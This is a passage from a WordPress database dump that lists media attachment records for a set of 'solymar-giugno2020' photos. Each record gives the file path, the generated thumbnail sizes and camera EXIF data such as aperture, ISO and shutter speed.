\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0044-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992431\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:6:\"0.0025\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22209,1195,'_wp_attached_file','2020/10/solymar-giugno2020-0045-1.jpg'),(22210,1195,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0045-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0045-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0045-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992459\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"46\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.004\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22211,1196,'_wp_attached_file','2020/10/solymar-giugno2020-0046.jpg'),(22212,1196,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0046.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0046-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0046-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0046-830x1245.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:1245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-230x345.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-350x525.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0046-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992487\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"34\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.066666666666667\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22213,1197,'_wp_attached_file','2020/10/solymar-giugno2020-0050-1.jpg'),(22214,1197,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:37:\"2020/10/solymar-giugno2020-0050-1.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"solymar-giugno2020-0050-1-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"solymar-giugno2020-0050-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992605\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22215,1198,'_wp_attached_file','2020/10/solymar-giugno2020-0052.jpg'),(22216,1198,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0052.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0052-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0052-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0052-830x1245.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:1245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-230x345.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-350x525.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0052-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592992632\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:8:\"0.000125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22217,1199,'_wp_attached_file','2020/10/solymar-giugno2020-0055.jpg'),(22218,1199,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0055.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0055-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0055-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"16\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592993525\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"70\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:5:\"0.008\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22219,1200,'_wp_attached_file','2020/10/solymar-giugno2020-0066.jpg'),(22220,1200,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1280;s:6:\"height\";i:853;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0066.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0066-1024x682.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:682;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-830x553.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:553;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-230x153.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:153;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-350x233.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:233;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-480x320.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-600x400.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0066-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"9\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"ILCE-7M3\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1592996581\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"24\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(22221,1201,'_wp_attached_file','2020/10/solymar-giugno2020-0181.jpg'),(22222,1201,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:853;s:6:\"height\";i:1280;s:4:\"file\";s:35:\"2020/10/solymar-giugno2020-0181.jpg\";s:5:\"sizes\";a:15:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-200x300.jpg\";s:5:\"width\";i:200;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0181-682x1024.jpg\";s:5:\"width\";i:682;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0181-768x1152.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1152;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-large-thumb\";a:4:{s:4:\"file\";s:36:\"solymar-giugno2020-0181-830x1245.jpg\";s:5:\"width\";i:830;s:6:\"height\";i:1245;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"sydney-medium-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-550x400.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"sydney-small-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-230x345.jpg\";s:5:\"width\";i:230;s:6:\"height\";i:345;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"sydney-service-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-350x525.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:525;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"sydney-mas-thumb\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-480x720.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:720;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-300x375.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:375;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:35:\"solymar-giugno2020-0181-600x900.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:900;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"s